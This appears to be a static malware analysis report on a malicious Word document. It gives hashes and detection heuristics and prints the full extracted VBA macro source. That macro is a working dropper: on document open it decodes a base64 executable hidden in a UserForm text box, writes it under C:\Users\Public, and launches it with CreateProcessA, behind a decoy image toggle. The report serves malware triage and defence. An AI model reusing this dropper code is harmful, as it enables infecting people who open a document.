Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 bb1e8b207999c799…

MALICIOUS

Office (OLE) / .DOC

1.37 MB Created: 2025-08-23 10:25:00 Authoring application: Microsoft Office Word First seen: 2026-06-15
MD5: ebb181a5c54f3316869d878c932537d3 SHA-1: 74194db44ebf5c904d20ee46191fcb9507b46d99 SHA-256: bb1e8b207999c799f1044de8e945a7bfdac405bdda1a45e675480d52afd2438f
310 Risk Score

Heuristics 10

  • ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPER
    The VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes
    Disassembly hidden — these bytes score as data, not coherent x86 code (3/8 branch targets land on an instruction boundary (38% coherence)).
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5815 bytes
SHA-256: 8f927deadde23cbbed0efc452afd9e0e28aff84df1ada8b081539f981ca48624
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function CreateProcessA Lib "kernel32" ( _
    ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    ByVal lpProcessAttributes As LongPtr, _
    ByVal lpThreadAttributes As LongPtr, _
    ByVal bInheritHandles As Long, _
    ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As LongPtr, _
    ByVal lpCurrentDirectory As String, _
    lpStartupInfo As Any, _
    lpProcessInformation As Any) As Long

Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
    ByVal hObject As LongPtr) As Long

Private Type STARTUPINFO
    cb As Long
    lpReserved As LongPtr
    lpDesktop As LongPtr
    lpTitle As LongPtr
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As LongPtr
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type

Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type

Function Base64Decode(ByVal base64String As String) As Byte()
    Dim xmlObj As Object
    Dim nodeObj As Object

    Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0")
    Set nodeObj = xmlObj.createElement("b64")

    nodeObj.DataType = "bin.base64"
    nodeObj.Text = base64String

    Base64Decode = nodeObj.nodeTypedValue
End Function

Sub Run_e(ByVal exePath As String)
    On Error GoTo ErrorHandler

    Dim si As STARTUPINFO
    Dim pi As PROCESS_INFORMATION
    Dim ret As Long

    si.cb = LenB(si)

    ret = CreateProcessA(exePath, vbNullString, 0, 0, 0, 0, 0, vbNullString, si, pi)

    If ret <> 0 Then
        CloseHandle pi.hProcess
        CloseHandle pi.hThread
    Else
        MsgBox "Failed to start process: " & Err.Description
    End If

    Exit Sub

ErrorHandler:
    MsgBox "Error in Run_e: " & Err.Description
End Sub



Sub SmartToggle()
    On Error GoTo ErrorHandler
    
    Dim doc As Document
    Set doc = ActiveDocument
    
    Dim img1 As Shape, img2 As Shape
    Set img1 = doc.Shapes("FullImage1")
    Set img2 = doc.Shapes("FullImage2")
    

    If img1.AlternativeText = "Front" Then
        img1.WrapFormat.Type = wdWrapBehind
        img2.WrapFormat.Type = wdWrapFront
        img2.ZOrder msoBringToFront
        img1.AlternativeText = "Back"
        img2.AlternativeText = "Front"
    Else
        img2.WrapFormat.Type = wdWrapBehind
        img1.WrapFormat.Type = wdWrapFront
        img1.ZOrder msoBringToFront
        img1.AlternativeText = "Front"
        img2.AlternativeText = "Back"
    End If
    
    Exit Sub

ErrorHandler:
    MsgBox "Error: " & Err.Description
End Sub


Private Sub Document_Open()
    On Error GoTo ErrorHandler


    SmartToggle


    Dim pathh As String
    Dim appBytes() As Byte
    Dim fileNum As Integer

    pathh = "C:\Users\Public\ui.txt"

    
    appBytes = Base64Decode(UserForm1.bodf90.Text)

    fileNum = FreeFile
    Open pathh For Binary Access Write As #fileNum
    Put #fileNum, 1, appBytes
    Close #fileNum

    Run_e pathh

    Exit Sub

ErrorHandler:
    MsgBox "Error in Document_Open: " & Err.Description
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{919618CB-62F5-4C41-BE37-81DFF65F57CA}{1FFE6BE1-856B-429D-980A-A968B67887C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub bodf90_Change()

End Sub

Attribute VB_Name = "Module1"

Sub CreateFullPageImages_NoFade()
    On Error GoTo ErrorHandler
    
    Dim doc As Document
    Set doc = ActiveDocument
    
    ' Delete existing shapes
    Do While doc.Shapes.Count > 0
        doc.Shapes(1).Delete
    Loop
    
    ' Page dimensions
    Dim pageWidth As Single, pageHeight As Single
    pageWidth = doc.PageSetup.pageWidth
    pageHeight = doc.PageSetup.pageHeight
    
    ' Margin offsets
    Dim leftMargin As Single, topMargin As Single
    leftMargin = doc.PageSetup.leftMargin
    topMargin = doc.PageSetup.topMargin
    
    ' Add first image
    Dim img1 As Shape
    Set img1 = doc.Shapes.AddPicture( _
        FileName:="C:\Users\jojo\Desktop\im\Image1.jpg", _
        LinkToFile:=False, _
        SaveWithDocument:=True, _
        Left:=-leftMargin, _
        Top:=-topMargin, _
        Width:=pageWidth, _
        Height:=pageHeight)
    img1.LockAspectRatio = msoFalse
    img1.WrapFormat.Type = wdWrapBehind
    img1.Name = "FullImage1"
    img1.AlternativeText = "Back"
    
    ' Add second image
    Dim img2 As Shape
    Set img2 = doc.Shapes.AddPicture( _
        FileName:="C:\Users\jojo\Desktop\im\Image2.jpg", _
        LinkToFile:=False, _
        SaveWithDocument:=True, _
        Left:=-leftMargin, _
        Top:=-topMargin, _
        Width:=pageWidth, _
        Height:=pageHeight)
    img2.LockAspectRatio = msoFalse
    img2.WrapFormat.Type = wdWrapFront
    img2.Name = "FullImage2"
    img2.AlternativeText = "Front"
    
    img2.ZOrder msoBringToFront
    
    MsgBox "Images created and initialized!"
    
    Exit Sub

ErrorHandler:
    MsgBox "Error: " & Err.Description
End Sub
vba_embedded_payload.bin vba-embedded-pe decoded from a hex/base64 payload string in a VBA UserForm control or macro literal 804352 bytes
SHA-256: 69c0c0d0cdfcebb698d952751f28f914a67f67a5e1bd81b4a1a4529ee7b78cbe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 shell/COM execution token(s).